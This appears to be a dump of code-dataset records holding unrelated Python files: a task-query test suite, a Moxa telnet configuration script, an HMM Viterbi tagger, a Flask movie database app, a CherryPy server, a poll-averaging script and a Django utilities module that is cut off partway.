test_task_by_oguid_returns_non_for_unknown_oguids(self):\n self.login(self.regular_user)\n\n self.assertIsNone(Task.query.by_oguid('theanswer:42'))\n\n def test_py_path(self):\n self.login(self.regular_user)\n\n self.assertEquals(self.task.get_sql_object(),\n Task.query.by_path(self.task.get_physical_path(), 'plone'))\n\n def test_py_path_returns_none_for_not_existing_task(self):\n self.login(self.regular_user)\n\n self.assertEquals(None, Task.query.by_path('test/not-existng/', 'plone'))\n\n def test_by_ids_returns_tasks_wich_match_the_given_id(self):\n self.login(self.regular_user)\n\n tasks = [self.task, self.subtask, self.meeting_subtask]\n\n self.assertEquals(\n [task.get_sql_object() for task in tasks],\n Task.query.by_ids([task.get_sql_object().id for task in tasks]))\n\n def test_by_assigned_org_unit(self):\n self.login(self.regular_user)\n\n additional = self.add_additional_org_unit()\n\n self.task.get_sql_object().assigned_org_unit = additional.id()\n self.meeting_subtask.get_sql_object().assigned_org_unit = additional.id()\n\n self.assertItemsEqual(\n [self.task.get_sql_object(), self.meeting_subtask.get_sql_object()],\n Task.query.by_assigned_org_unit(additional).all())\n\n def test_by_issuing_org_unit(self):\n self.login(self.regular_user)\n\n additional = self.add_additional_org_unit()\n\n self.task.get_sql_object().issuing_org_unit = additional.id()\n self.meeting_subtask.get_sql_object().issuing_org_unit = additional.id()\n\n self.assertEquals(\n [self.task.get_sql_object(), self.meeting_subtask.get_sql_object()],\n Task.query.by_issuing_org_unit(additional).all())\n\n def test_all_issued_tasks_lists_all_tasks_created_on_given_admin_unit(self):\n self.login(self.regular_user)\n\n additional = create(Builder('admin_unit').id(\"additional\"))\n\n tasks = [self.task.get_sql_object(),\n self.meeting_subtask.get_sql_object()]\n\n self.task.get_sql_object().admin_unit_id = additional.id()\n self.meeting_subtask.get_sql_object().admin_unit_id = additional.id()\n\n self.assertItemsEqual(\n tasks, Task.query.all_issued_tasks(additional).all())\n\n def test_restrict_checks_principals(self):\n # Responsible user is able to see\n self.login(self.regular_user)\n sql_task = self.task_in_protected_dossier.get_sql_object()\n self.assertIn(sql_task, Task.query.restrict().all())\n\n # Secretariat user is not able to see the task\n self.login(self.secretariat_user)\n self.assertNotIn(sql_task, Task.query.restrict().all())\n\n def test_restrict_checks_is_skipped_for_admins(self):\n # Responsible user is able to see\n self.login(self.administrator)\n sql_task = self.task_in_protected_dossier.get_sql_object()\n self.assertIn(sql_task, Task.query.restrict().all())\n\n def test_by_container_list_recursive_all_tasks_inside_the_given_container(self):\n self.login(self.regular_user)\n\n self.assertItemsEqual(\n [self.task.get_sql_object(),\n self.subtask.get_sql_object(),\n self.sequential_task.get_sql_object(),\n self.seq_subtask_1.get_sql_object(),\n self.seq_subtask_2.get_sql_object(),\n self.seq_subtask_3.get_sql_object(),\n self.info_task.get_sql_object(),\n self.private_task.get_sql_object(),\n self.inbox_task.get_sql_object()],\n Task.query.by_container(self.dossier, get_current_admin_unit()).all())\n\n def test_by_container_handles_similar_paths_exactly(self):\n self.login(self.regular_user)\n\n # manually set a similar physical path than self.task\n self.sequential_task.get_sql_object().physical_path = (\n 'ordnungssystem/fuhrung/vertrage-und-vereinbarungen/dossier-11'\n '/task-3'\n ) # Do not add commas within this grouping - this is a string!\n\n tasks = Task.query.by_container(self.dossier, get_current_admin_unit()).all()\n\n self.assertIn(self.task.get_sql_object(), tasks)\n self.assertNotIn(self.sequential_task.get_sql_object(), tasks)\n\n def test_by_container_queries_adminunit_dependent(self):\n self.login(self.regular_user)\n\n additional = create(Builder('admin_unit').id(\"additional\"))\n self.assertItemsEqual(\n [],\n Task.query.by_container(self.dossier, additional).all())\n\n def test_by_brain_returns_corresponding_sql_task(self):\n self.login(self.regular_user)\n\n self.assertEquals(\n self.task.get_sql_object(),\n Task.query.by_brain(obj2brain(self.task)))\n\n def test_by_brain_queries_adminunit_dependent(self):\n self.login(self.regular_user)\n\n self.assertEquals(\n self.task.get_sql_object(),\n Task.query.by_brain(obj2brain(self.task)))\n\n # manually change admin_unit of task\n self.task.get_sql_object().admin_unit_id = 'additional'\n\n with self.assertRaises(NoResultFound):\n self.assertIsNone(Task.query.by_brain(obj2brain(self.task)))\n\n def test_subtasks_by_task_returns_all_subtask_excluding_the_given_one(self):\n self.login(self.regular_user)\n\n self.assertEqual(\n [self.seq_subtask_1.get_sql_object(),\n self.seq_subtask_2.get_sql_object(),\n self.seq_subtask_3.get_sql_object()],\n Task.query.subtasks_by_task(self.sequential_task.get_sql_object()).all())\n\n def test_subtasks_by_task_returns_empty_list_when_no_subtask_exists(self):\n self.login(self.regular_user)\n\n self.assertEqual(\n [],\n Task.query.subtasks_by_task(self.expired_task.get_sql_object()).all())\n","sub_path":"opengever/globalindex/tests/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"551633570","text":"#!/usr/bin/env python\n#\n\nimport telnetlib\nimport time\nimport os\nterminator = \"\\n\"\nf = file(\"/home/remos/REMOS/desk/disintroy.txt\",\"a\")\n\nf.write(\"Begin operations.\"+terminator)\n\ntn = telnetlib.Telnet('remmoxa')\n\not=tn.read_until(\"selection:\", 4)\nf.write(\"-1-\"+ot+terminator)\ntn.write(\"v\" + terminator)\n#tn.write(\"3\" + terminator)\not=tn.read_until(\"selection:\", 4)\nf.write(\"-1b-\"+ot+terminator)\ntn.write(\"q\" + terminator)\n\ntstr = time.gmtime()\nf.write(str(tstr)+terminator)\n\nif (0) :\n ot=tn.read_until(\"selection:\", 4)\n f.write(\"-2-\"+ot+terminator)\n tn.write(\"4\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(\"-3-\"+ot+terminator)\n tn.write(\"2\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(ot+terminator)\n tn.write(\"a\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(ot+terminator)\n tn.write(\"q\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(ot+terminator)\n tn.write(\"q\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(ot+terminator)\n tn.write(\"s\" + terminator)\n ot=tn.read_until(\"selection:\", 4)\n f.write(ot+terminator)\n tn.write(\"y\" + terminator)\n\n#time.sleep(45)\n\not = 'fine'\n#ot = tn.read_all()\nf.write(\"ALL:\"+ot+terminator)\n\ntn.close()\n\nf.write(\"End operations.\"+terminator)\n\nf.close()\n#\n\n","sub_path":"REMOS/desk/moxaBaud.py","file_name":"moxaBaud.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"215899474","text":"import time\nstart_time = time.time()\nimport json, sys\npathRead = 'hmmmodel.txt'\nParameters = [json.loads(x) for x in open(pathRead, mode = 'r', encoding = 'UTF-8').read().split('\\n')]\ntagCount = Parameters[0]\nwordGivenTag = Parameters[1]\ntagGivenTag = Parameters[2]\n\ndef ViterbiAlgo(tagCount, wordGivenTag, tagGivenTag):\n pathTest = sys.argv[1]\n f = open(pathTest, encoding = 'UTF-8')\n allSentencesTest = f.read()\n sentencesListTest = allSentencesTest.splitlines()\n taggedSents = []\n for sentence in sentencesListTest:\n wordList = sentence.split()\n firstWord = wordList[0]\n Viterbi = []#Viterbi is a 3D Dictionary containing word as the state, all tags for each state\n#Calculate Viterbi for first word\n Viterbi.append({})\n States ={}\n if firstWord in wordGivenTag.keys():\n States = wordGivenTag[firstWord]\n else:\n States = tagCount\n for tag in States.keys():\n if tag == '_START_':\n continue\n if firstWord in wordGivenTag.keys():\n emissionProb = wordGivenTag[firstWord][tag]\n else:\n emissionProb = 1\n Viterbi[0][tag]={}\n Viterbi[0][tag]['probability'] = tagGivenTag['_START_'][tag] * emissionProb \n Viterbi[0][tag]['backpointer'] = '_START_'\n \n #Start from word 1\n for i in range(1,len(wordList)):\n word = wordList[i]\n Viterbi.append({})\n if word in wordGivenTag.keys():\n States = wordGivenTag[word]\n else:\n States = tagCount\n for currTag in States.keys():\n if currTag == '_START_' or currTag == '_END_':\n continue\n if word in wordGivenTag.keys():\n emissionProb = wordGivenTag[word][currTag]\n else:\n emissionProb = 1\n maxProb ={'prob':0,'backpointer':''}\n #print(\"Previous Keys \", Viterbi[i-1].keys())#['probability'])\n #print(\"len of Viterbi\", len(Viterbi[i-1]))\n for prevTag in Viterbi[i-1].keys():#CHeck This\n if prevTag == '_START_' or prevTag == '_END_':\n continue\n tempProb = Viterbi[i-1][prevTag]['probability'] * \\\n tagGivenTag[prevTag][currTag] * \\\n emissionProb\n if(tempProb>maxProb['prob']):\n maxProb['prob'] = tempProb\n maxProb['backpointer'] = prevTag#Viterbi[i-1][prevTag]['backpointer']\n\n Viterbi[i][currTag] = {}\n Viterbi[i][currTag]['probability'] = maxProb['prob']\n Viterbi[i][currTag]['backpointer'] = maxProb['backpointer']\n \n #print(\"currTag given to\", i, \" is\", Viterbi[i][currTag])\n #print(c,\"\\n\")\n #Do for End\n States = Viterbi[-1].keys()\n n = len(wordList)\n Viterbi.append({})\n maxProb ={'prob':0,'backpointer':''}\n for tag in States:\n if tag == '_END_':\n continue\n tempProb = Viterbi[n-1][tag]['probability'] * \\\n tagGivenTag[tag]['_END_'] \n if(tempProb>maxProb['prob']):\n maxProb['prob'] = tempProb\n maxProb['backpointer'] = tag\n Viterbi[-1]['_END_']={}\n Viterbi[-1]['_END_']['probability'] = maxProb['prob']\n Viterbi[-1]['_END_']['backpointer'] = maxProb['backpointer'] \n taggedSents.append(tagSentence(Viterbi, wordList))\n\n print(len(taggedSents))\n writeFile(taggedSents)\n\ndef tagSentence(Viterbi, wordList):\n state = len(wordList)\n #print(Viterbi[state]['_END_'])\n tag = '_END_'\n iList = \"\"\n i = len(wordList)-1\n while i >= 0:\n #print(Viterbi[state][tag])\n iList = wordList[i]+\"/\"+Viterbi[state][tag]['backpointer']+\" \" + iList\n tag = Viterbi[state][tag]['backpointer']\n state -= 1\n i-=1\n return iList\n \ndef writeFile(taggedSents):\n writeFilePath = 'hmmoutput.txt'\n writeFile = open(writeFilePath, mode = 'w', encoding = 'UTF-8')\n for sentence in taggedSents:\n writeFile.write(sentence)\n writeFile.write(\"\\n\")\n \nViterbiAlgo(tagCount, wordGivenTag, tagGivenTag)\n","sub_path":"Generalised Parts Of Speech Tagger/hmmdecode3.py","file_name":"hmmdecode3.py","file_ext":"py","file_size_in_byte":4528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"512301378","text":"\"\"\"\n知道了如何读写文本文件要读写二进制文件也就很简单了,下面的代码实现了复制图片文件的功能。\n\"\"\"\n\n\ndef main():\n try:\n # read binary - rb\n with open('a.jpg', 'rb') as fs1:\n data = fs1.read()\n print(type(data)) # \n # write binary - wb\n with open('b.jpg', 'wb') as fs2:\n # 图片写入fs2 图片binary info data into b.jpg\n fs2.write(data)\n except FileNotFoundError as e:\n print('指定的文件无法打开.')\n except IOError as e:\n print('读写文件时出现错误.')\n print('程序执行结束.')\n\n\nif __name__ == '__main__':\n main()","sub_path":"cn/study/days100/days011/05读写二进制文件.py","file_name":"05读写二进制文件.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"154274300","text":"import os\nfrom flask import Flask, session, render_template, request, flash, redirect, url_for, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'hard to guess secure key'\n\n# INITIALIZE SQLAlchemy\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')\ndb = SQLAlchemy(app)\n\n# DEFINITION OF ACTOR TABLE\nclass Actor(db.Model):\n __tablename__ = 'actors'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(64))\n about = db.Column(db.Text)\n # one-to-many relationship\n movies = db.relationship('Movie', backref='actor', cascade=\"delete\")\n\n# DEFINITION OF MOVIE TABLE\nclass Movie(db.Model):\n __tablename__ = 'movies'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(256))\n year = db.Column(db.Integer)\n actor_id = db.Column(db.Integer, db.ForeignKey('actors.id'))\n\n# HOMEPAGE ROUTE\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n# ACTOR TABLE ROUTE\n@app.route('/actors')\ndef show_all_actors():\n actors = Actor.query.all()\n return render_template('actors-all.html', actors=actors)\n\n# ADD ACTOR FORM ROUTE\n@app.route('/actors/add/', methods=['GET', 'POST'])\ndef add_actors():\n if request.method == 'GET':\n return render_template('actors-add.html')\n if request.method == 'POST':\n name = request.form['name']\n about = request.form['about']\n actor = Actor(name=name, about=about)\n db.session.add(actor)\n db.session.commit()\n return redirect(url_for('show_all_actors'))\n\n# ADD ACTOR BUTTON ROUTE\n@app.route('/api/actors/add', methods=['POST'])\ndef add_ajax_actors():\n name = request.form['name']\n about = request.form['about']\n actor = Actor(name=name, about=about)\n db.session.add(actor)\n db.session.commit()\n flash('Actor Inserted', 'success')\n return jsonify({\"id\": str(actor.id), \"name\": actor.name})\n\n# EDIT ACTOR ROUTE\n@app.route('/actors/edit/', methods=['GET', 'POST'])\ndef edit_actor(id):\n actor = Actor.query.filter_by(id=id).first()\n if request.method == 'GET':\n return render_template('actors-edit.html', actor=actor)\n if request.method == 'POST':\n actor.name = request.form['name']\n actor.about = request.form['about']\n db.session.commit()\n return redirect(url_for('show_all_actors'))\n\n# DELETE ACTOR ROUTE\n@app.route('/actors/delete/', methods=['GET', 'POST'])\ndef delete_actor(id):\n actor = Actor.query.filter_by(id=id).first()\n if request.method == 'GET':\n return render_template('actors-delete.html', actor=actor)\n if request.method == 'POST':\n db.session.delete(actor)\n db.session.commit()\n return redirect(url_for('show_all_actors'))\n\n# DELETE AJAX ROUTE\n@app.route('/api/actors/', methods=['DELETE'])\ndef delete_ajax_actor(id):\n actor = Actor.query.get_or_404(id)\n db.session.delete(actor)\n db.session.commit()\n return jsonify({\"id\": str(actor.id), \"name\": actor.name})\n\n# MOVIE TABLE ROUTE\n@app.route('/movies')\ndef show_all_movies():\n movies = Movie.query.all()\n return render_template('movie-all.html', movies=movies)\n\n# ADD MOVIE FORM ROUTE\n@app.route('/movie/add', methods=['GET', 'POST'])\ndef add_movies():\n if request.method == 'GET':\n actors = Actor.query.all()\n return render_template('movie-add.html', actors=actors)\n if request.method == 'POST':\n name = request.form['name']\n year = request.form['year']\n actor_name = request.form['actor']\n actor = Actor.query.filter_by(name=actor_name).first()\n movie = Movie(name=name, year=year, actor=actor)\n db.session.add(movie)\n db.session.commit()\n return redirect(url_for('show_all_movies'))\n\n# EDIT MOVIE ROUTE\n@app.route('/movie/edit/', methods=['GET', 'POST'])\ndef edit_movie(id):\n movie = Movie.query.filter_by(id=id).first()\n actors = Actor.query.all()\n if request.method == 'GET':\n return render_template('movie-edit.html', movie=movie, actors=actors)\n if request.method == 'POST':\n movie.name = request.form['name']\n movie.year = request.form['year']\n actor_name = request.form['actor']\n actor = Actor.query.filter_by(name=actor_name).first()\n movie.actor = actor\n db.session.commit()\n return redirect(url_for('show_all_movies'))\n\n# DELETE MOVIE ROUTE\n@app.route('/movie/delete/', methods=['GET', 'POST'])\ndef delete_movie(id):\n movie = Movie.query.filter_by(id=id).first()\n actors = Actor.query.all()\n if request.method == 'GET':\n return render_template('movie-delete.html', movie=movie, actors=actors)\n if request.method == 'POST':\n db.session.delete(movie)\n db.session.commit()\n return redirect(url_for('show_all_movies'))\n\n# DELETE MOVIE AJAX ROUTE\n@app.route('/api/movie/', methods=['DELETE'])\ndef delete_ajax_movie(id):\n movie = Movie.query.get_or_404(id)\n db.session.delete(movie)\n db.session.commit()\n return jsonify({\"id\": str(movie.id), \"name\": movie.name})\n\n# ABOUT ME ROUTE\n@app.route('/about')\ndef about():\n return render_template('about.html')\n\n# RUN PROGRAM\nif __name__ == '__main__':\n app.run()\n","sub_path":"misy350-final/finalproject/moviebase.py","file_name":"moviebase.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"288754150","text":"#coding=utf-8 \nfrom __future__ import division\nimport os, os.path\nimport cherrypy\nimport string\nimport json\n\nimport searchServer\nimport exploreServer\nimport LDAServer\n\nclass Papernet_index(object):\n @cherrypy.expose\n def index(self):\n return open('index.html')\n def dashboard(self):\n return open('dashboard.html')\n def explore(self):\n return open('explore.html')\n def LDA(self):\n return open('LDA.html')\n\n\n\nif __name__ == '__main__':\n conf = {\n '/': {\n 'tools.sessions.on': True,\n 'tools.staticdir.root': os.path.abspath(os.getcwd())\n },\n \n '/dashboard': {\n 'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type', 'text/plain')],\n },\n\n '/explore': {\n 'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type', 'text/plain')],\n }, \n\n '/LDA': {\n 'request.dispatch': cherrypy.dispatch.MethodDispatcher(),\n 'tools.response_headers.on': True,\n 'tools.response_headers.headers': [('Content-Type', 'text/plain')],\n }, \n \n '/static': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.dir': './'\n }\n }\n\n webapp = Papernet_index()\n webapp.dashboard = searchServer.Papernet_dashboardService()\n webapp.explore = exploreServer.Papernet_exploreService()\n webapp.LDA = LDAServer.Papernet_LDAService()\n cherrypy.server.socket_host= \"0.0.0.0\"\n cherrypy.quickstart(webapp, '/', conf)\n\n\n\n\n","sub_path":"papernetServer.py","file_name":"papernetServer.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"206966036","text":"#This program is a class that I will work on to get better with\n#working with classes.\n\nclass human:\n\n def __init__(self, name):\n self.name = name\n self.bladder = 0\n\n def greet(self):\n print(\"Hello my name is \" + self.name)\n\n def drink(self):\n print(self.name + \" is drinking!\")\n self.bladder += 3 \n if self.bladder > 6:\n print(\"You really need to go to the bathroom!\")\n elif self.bladder > 3: \n print(\"You may need to go to the bathroom soon!\")\n \n\n def bladder_level(self):\n print(\"Your bladder is this full: \" + str(self.bladder))\n\n def bathroom(self):\n print(self.name + \" went to the bathroom!\")\n self.bladder -= 3\n\nperson = human(\"Mike\")\nperson.greet()\nperson.bladder_level()\nperson.drink()\nperson.bladder_level()\nperson.drink()\nperson.bladder_level()\nperson.drink()\nperson.bladder_level()\nperson.bathroom()\nperson.bladder_level()\n\n# class Human:\n\n# def __init__(self, fname, lname, age, sex):\n# self.fname = fname\n# self.lname = lname\n# self.age = age\n# self.sex = sex\n\n# def intro(self):\n# print(\"Hello \" + self.fname.title() + \" I am pleased to meet you!\")\n\n# def walk(self):\n# print(self.fname.title() + \" is now walking!\")\n\n# def sleep(self):\n# print(self.fname.title() + \" is now sleeping!\")\n\n# def running(self):\n# print(self.fname.tite() + \" is now running!\")\n\n\n# first = Human(\"adam\", \" \", 10, \"male\")\n# first.intro()\n# first.walk()\n# first.sleep()","sub_path":"nine/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"236296350","text":"import csv\nimport numpy as np\nimport math\nfrom datetime import date\n\nfilename = 'Data/president_polls.csv'\n\nabbrevs = {\n 'Alabama': 'AL',\n 'Alaska': 'AK',\n 'Arizona': 'AZ',\n 'Arkansas': 'AR',\n 'California': 'CA',\n 'Colorado': 'CO',\n 'Connecticut': 'CT',\n 'Delaware': 'DE',\n 'District of Columbia': 'DC',\n 'Florida': 'FL',\n 'Georgia': 'GA',\n 'Hawaii': 'HI',\n 'Idaho': 'ID',\n 'Illinois': 'IL',\n 'Indiana': 'IN',\n 'Iowa': 'IA',\n 'Kansas': 'KS',\n 'Kentucky': 'KY',\n 'Louisiana': 'LA',\n 'Maine': 'ME',\n 'Maryland': 'MD',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'Minnesota': 'MN',\n 'Mississippi': 'MS',\n 'Missouri': 'MO',\n 'Montana': 'MT',\n 'Nebraska': 'NE',\n 'Nevada': 'NV',\n 'New Hampshire': 'NH',\n 'New Jersey': 'NJ',\n 'New Mexico': 'NM',\n 'New York': 'NY',\n 'North Carolina': 'NC',\n 'North Dakota': 'ND',\n 'Ohio': 'OH',\n 'Oklahoma': 'OK',\n 'Oregon': 'OR',\n 'Pennsylvania': 'PA',\n 'Rhode Island': 'RI',\n 'South Carolina': 'SC',\n 'South Dakota': 'SD',\n 'Tennessee': 'TN',\n 'Texas': 'TX',\n 'Utah': 'UT',\n 'Vermont': 'VT',\n 'Virginia': 'VA',\n 'Washington': 'WA',\n 'West Virginia': 'WV',\n 'Wisconsin': 'WI',\n 'Wyoming': 'WY'\n}\n\n\n\nclass Poll(object):\n \"\"\"\n A poll gives a rough estimate of how the electorate in a state is thinking\n \"\"\"\n def __init__(self, question_id, end=None, state=None, pop=None, rate=None, sample=None, method=None, Dpct = 0, Rpct = 0):\n self.question_id = question_id\n self.date = end\n self.state = state\n self.pop = pop\n self.rate = rate\n self.sample = sample\n self.method = method\n self.Dpct = Dpct\n self.Rpct = Rpct\n \n def getDpct(self):\n return self.Dpct\n \n def getRpct(self):\n return self.Rpct\n \n \n def addDpct(self, Dpct):\n self.Dpct = Dpct\n \n def addRpct(self, Rpct):\n self.Rpct = Rpct\n \n def getPop(self):\n return self.pop\n \n def getMethod(self):\n return self.method\n \n def getMargin(self):\n return self.Rpct - self.Dpct\n \n def getGrade(self):\n return self.rate\n \n def getSample(self):\n return self.sample\n\n def __str__(self):\n if self.getMargin() > 0:\n m = \"Trump +\" + str(self.getMargin())\n elif self.getMargin() < 0:\n m = \"Biden +\" + str(-self.getMargin())\n else:\n m = \"TIE\"\n return self.state + \" Date: \"+ self.date + \" Result: \" + m\n \n def __eq__(self, other):\n return self.question_id == other.question_id\n\ndef loadPolls(file, states):\n polls = {}\n for state in states:\n polls[state] = []\n pending = {}\n day = str(date.today()).split('-')\n with open(file, \"r\") as f:\n reader = csv.DictReader(f)\n for row in reader:\n qid = row[\"question_id\"]\n end = row[\"end_date\"]\n intime = False\n if end != '':\n enddate = end.split('/')\n if (int(day[1]) - int(enddate[0]) <= 1) or (int(day[1]) - int(enddate[0] == 2 and int(day[2]) <= int(enddate[1]))):\n if enddate[2] == \"2020\" or enddate[2] == \"20\":\n intime = True\n \n if (row['state'] in abbrevs and row['fte_grade'] != '' and row['sponsor_candidate'] == ''\n and row['partisan'] == '' and row['tracking'] == '' and row['sample_size'] != '' and intime):\n \n if qid not in pending.keys():\n try:\n pending[qid] = Poll(qid, end=end, state=row['state'], \n pop=row['population_full'],rate=row['fte_grade'],\n sample=int(row['sample_size']),method=row[\"methodology\"])\n except:\n raise ValueError(qid)\n if row[\"answer\"] == \"Biden\":\n pending[qid].addDpct(float(row[\"pct\"]))\n elif row[\"answer\"] == \"Trump\":\n pending[qid].addRpct(float(row[\"pct\"]))\n try:\n if pending[qid].getDpct() != 0 and pending[qid].getRpct() != 0:\n polls[row['state']].append(pending[qid])\n del pending[qid]\n except:\n pass\n return polls\n\ndef getAS(polls, states):\n \"\"\"\n Uses a list of polls to get an average and standard deviation for each state\n Where output[state] = (average, standard deviation) or (None, None) if no polls are available\n \"\"\"\n ans = {} #average, standard deviation\n rates = {\"A+\":1, \"A\": 0.9, \"A-\": 0.8, \"B+\": 0.7, \"B\": 0.6, \"B-\": 0.5, \"C+\": 0.45, \"C\": 0.4, \"C-\": 0.35, \"D+\": 0.3, \"D\": 0.25, \"D-\": 0.2, \"F\": 0.1, 'A/B': 0.6, 'B/C': 0.4, 'C/D': 0.25}\n pops = {\"lv\": 1, \"v\": 0.9, \"rv\": 0.8, \"a\": 0.75}\n methods = {'Online': 0.5, 'Automated Phone': 1, 'IVR/Online': 0.6, 'Online/IVR': 0.6, 'Live Phone': 1.2, \n 'IVR/Text': 0.75, 'Online/Text': 0.6, 'IVR/Live Phone': 1, 'Live Phone/Online/Text': 0.75, \n 'Text': 0.8, 'Live Phone/Online': 0.8, 'Live Phone/Text': 1}\n for state in states:\n p = polls[state]\n average = 0\n size = 0\n count = 0\n for poll in p:\n average += poll.getMargin()\n size += poll.getSample() * rates[poll.getGrade()] * pops[poll.getPop()] * methods[poll.getMethod()]\n count += 1\n try:\n ans[states[state]] = (round(average/count,3), round(100/math.sqrt(size/count)/1.96, 3))\n except ZeroDivisionError:\n ans[states[state]] = (None, None)\n return ans","sub_path":"Predict.py","file_name":"Predict.py","file_ext":"py","file_size_in_byte":5791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"100386334","text":"from datetime import timedelta\nimport settings\n\nfrom django.core.paginator import Paginator, InvalidPage, EmptyPage\n\nfrom hq.models import *\nfrom graphing.models import *\n\n\n\n\n#get members under this supervisor for this group\ndef get_members_for_supervisor(organization, supervisor_user): \n pass\n\ndef get_supervisor_roles(user):\n \"\"\"return an array of organizations that a user is a supervisor. The array is empty if they are nothing\"\"\"\n raise Exception(\"Someone needs to fix this method to no longer be dependent on model relationship if they're going to use it!\")\n \ndef get_membership(user):\n \"\"\"return an array of organizations that a user belongs to. The array is empty if they are nothing\"\"\"\n raise Exception(\"Someone needs to fix this method to no longer be dependent on model relationship if they're going to use it!\")\n\ndef get_members(organization):\n \"\"\"return an array of members in an organization\"\"\"\n raise Exception(\"Someone needs to fix this method to no longer be dependent on model relationship if they're going to use it!\")\n\ndef get_chart_group(user):\n # todo this makes a mean assumption there's only one\n # group \n try:\n prefs = GraphPref.objects.get(user=user)\n return prefs.root_graphs.all()[0]\n except GraphPref.DoesNotExist:\n return None\n\n\ndef get_members_and_supervisors(organization):\n \"\"\"Return a tuple (members[], supervisors[]) for a given organization.\n Deals with the empty lists and null objects for you so you don't have \n to.\n The contents of the tuples are reporter objects.\n \"\"\"\n members = []\n supervisors = []\n if organization:\n if organization.members:\n members = organization.members.reporters.all()\n if organization.supervisors:\n supervisors = organization.supervisors.reporters.all() \n return (members, supervisors)\n \n \ndef get_user_affiliation(user):\n (parents, children) = traversal.getImmediateRelationsForObject(user)\n raise Exception(\"Someone needs to fix this method to no longer be dependent on model relationship if they're going to use it!\")\n \ndef get_dates(request, default_days=0):\n default_delta = timedelta(days=default_days)\n enddate = datetime.datetime.now().date()\n startdate = enddate - default_delta\n if request:\n for item in request.GET.items():\n if item[0] == 'startdate':\n startdate_str=item[1]\n startdate = datetime.datetime.strptime(startdate_str,'%m/%d/%Y').date()\n if item[0] == 'enddate':\n enddate_str=item[1]\n enddate = datetime.datetime.strptime(enddate_str,'%m/%d/%Y').date()\n return (startdate, enddate)\n\ndef get_dates_reports(request, default_days_active=0, default_days_late=0):\n default_delta_active = timedelta(days=default_days_active)\n default_delta_late = timedelta(days=default_days_late)\n enddate = datetime.datetime.now().date()\n startdate_active = enddate - default_delta_active\n startdate_late = enddate - default_delta_late\n if request:\n for item in request.GET.items():\n if item[0] == 'startdate_active':\n startdate_active_str=item[1]\n startdate_active = datetime.datetime.strptime(\n startdate_active_str,'%m/%d/%Y').date()\n if item[0] == 'startdate_late':\n startdate_late_str=item[1]\n startdate_late = datetime.datetime.strptime(\n startdate_late_str,'%m/%d/%Y').date()\n if item[0] == 'enddate':\n enddate_str=item[1]\n enddate = datetime.datetime.strptime(enddate_str,\n '%m/%d/%Y').date()\n return (startdate_active, startdate_late, enddate)\n\ndef get_table_display_properties(request, default_items=25, default_sort_column = \"id\", \n default_sort_descending = True, default_filters = {}):\n \"\"\"Extract some display properties from a request object. The following \n parameters (with default values) are extracted. Andy of the defaults\n can be overridden by passing in values.\n items: 25 (the number of items to paginate at a time)\n sort_column: id (the column to sort by)\n sort_descending: True (the sort order of the column)\n filters: {} (key, value pairs of filters to apply)\n \"\"\"\n items = default_items\n sort_column = default_sort_column\n sort_descending = default_sort_descending\n # odd, for some reason pass-by-reference can confuse the default types here\n filters = default_filters.copy()\n # if no request found, just resort to all the defaults, but \n # don't fail hard.\n if request:\n # extract from request\n if \"items\" in request.GET:\n try:\n items = int(request.GET[\"items\"])\n except Exception:\n # just default to the above if we couldn't \n # parse it\n pass\n if \"sort_column\" in request.GET:\n sort_column = request.GET[\"sort_column\"]\n if \"sort_descending\" in request.GET:\n # a very dumb boolean parser\n sort_descending_str = request.GET[\"sort_descending\"]\n if sort_descending_str.startswith(\"f\"):\n sort_descending = False\n else:\n sort_descending = True\n found_filters = {}\n for param in request.GET:\n if param.startswith('filter_'):\n # we convert 'filter_x' into 'x' (the name of the field)\n field = param.split('_',1)[-1]\n found_filters[str(field)] = request.GET[param]\n if found_filters:\n filters = found_filters\n return (items, sort_column, sort_descending, filters)\n \ndef get_query_set(model_class, sort_column=\"id\", sort_descending=True, filters={}):\n \"\"\"Gets a query set, based on the results of the get_table_display_properties\n method, and a model.\"\"\" \n sort_modifier = \"\"\n if sort_descending:\n sort_modifier = \"-\"\n return model_class.objects.filter(**filters).order_by(\"%s%s\"% (sort_modifier, sort_column))\n \ndef paginate(request, data, rows_per_page=25):\n '''Helper call to provide django pagination of data'''\n paginator = Paginator(data, rows_per_page) \n try:\n page = int(request.GET.get('page', '1'))\n except ValueError:\n page = 1\n try:\n data_pages = paginator.page(page)\n except (EmptyPage, InvalidPage):\n data_pages = paginator.page(paginator.num_pages)\n return data_pages\n\ndef build_url(relative_path, request=None):\n '''Attempt to build a fully qualified url. It will first try to back\n it out of the request object, if 